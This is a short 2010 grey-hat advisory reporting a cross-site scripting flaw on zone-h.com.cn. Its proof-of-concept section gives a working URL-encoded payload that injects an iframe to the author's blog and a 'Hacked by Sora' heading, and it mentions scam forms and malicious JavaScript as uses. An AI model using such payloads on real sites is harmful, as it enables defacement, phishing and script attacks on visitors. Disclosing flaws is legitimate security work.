Zone-H.com.cn suffers from a cross site scripting vulnerability.
fc637706713f958906a767b9db011553c3f977c4ac74f4f4374cafdb59a4db83
.__
____________ ____ ____ | |__ ____ ____
\___ / _ \ / \_/ __ \ ______ | | \ ______ _/ ___\ / \
/ ( <_> ) | \ ___/ /_____/ | Y \ /_____/ \ \___| | \
/_____ \____/|___| /\___ > |___| / \___ >___| /
\/ \/ \/ \/ \/ \/
> Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
————————
1. INFORMATION |
————————
Site: http://www.zone-h.com.cn/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3
————————
2. DESCRIPTION |
————————
http://www.zone-h.com.cn/ suffers from a cross site scripting vulnerability. This vulnerability can be exploited in many ways.
An example is creating a form to scam other people, or to execute malicious javascript code on the victim’s computer.
————————
3. PROOF OF CONCEPT |
————————
HTML Code:
http://www.zone-h.com.cn/index.php?key=%3Ciframe+src%3D%22http%3A%2F%2Fwww.greyhathackers.wordpress.com%2F%22%3E%3Ch2%3E%3Ccenter%3EHacked+by+Sora+-+vhr95zw+[at]+hotmail+[dot]+com%3C%2Fcenter%3E%3C%2Fh2%3E&mode=user&Submit=+Search+
————————-
4. GREETZ |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #
————————-
5. CONTACT |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com
<c> 2010 – http://greyhathackers.wordpress.com – Sora